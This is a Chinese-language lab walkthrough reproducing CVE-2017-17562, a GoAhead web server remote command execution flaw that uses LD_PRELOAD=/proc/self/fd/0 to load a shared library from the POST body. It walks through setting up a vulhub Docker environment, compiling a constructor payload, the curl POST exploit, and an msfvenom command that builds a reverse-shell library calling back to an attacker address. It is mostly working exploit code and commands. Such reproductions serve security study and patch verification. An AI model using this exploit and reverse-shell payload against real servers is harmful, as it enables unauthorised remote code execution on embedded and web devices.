GoAhead-远程命令执行漏洞（CVE-2017-17562）

漏洞描述

GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server，多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序，这个漏洞就出现在运行CGI程序的时候。
GoAhead在接收到请求后，将会从URL参数中取出键和值注册进CGI程序的环境变量，且只过滤了REMOTE_HOST和HTTP_AUTHORIZATION。我们能够控制环境变量，就有很多攻击方式。比如在Linux中，LD_开头的环境变量和动态链接库有关，如LD_PRELOAD中指定的动态链接库，将会被自动加载；LD_LIBRARY_PATH指定的路径，程序会去其中寻找动态链接库。

我们可以指定LD_PRELOAD=/proc/self/fd/0，因为/proc/self/fd/0是标准输入，而在CGI程序中，POST数据流即为标准输入流。我们编译一个动态链接库，将其放在POST Body中，发送给http://target/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0，CGI就会加载我们发送的动态链接库，造成远程命令执行漏洞

安装https协议、CA证书、dirmngr

apt-get update

apt-get install -y apt-transport-https ca-certificates

apt-get install dirmngr

添加GPG密钥并添加更新源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list

系统更新以及安装docker

apt-get update&&apt install docker-ce

启动docker服务器 和compose

service docker start || apt install docker-compose

下载安装vulhub

git clone https://github.com/vulhub/vulhub.git

漏洞复现

攻击：192.168.1.162

目标：192.168.1.240

启动环境/vulhub-master/goahead/CVE-2017-17562

docker-compose up -d

编译动态链接库

#include <unistd.h>

static void before_main(void) attribute((constructor));

static void before_main(void)
{
write(1, “Hello: World!\n”, 14);
}

gcc -shared -fPIC ./payload.c -o payload.so

curl -X POST --data-binary @payload.so "http://192.168.1.240:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i 

Hello: world! 输出成功，说明动态链接库中的代码已被执行：

生成shell文件反弹

msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.1.162 LPORT=9999 -f elf-so -o payload.so

再次使用post命令

curl -X POST --data-binary @payload.so "http://192.168.1.240:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i 

参考链接

https://blog.csdn.net/Aesthetic99/article/details/12366362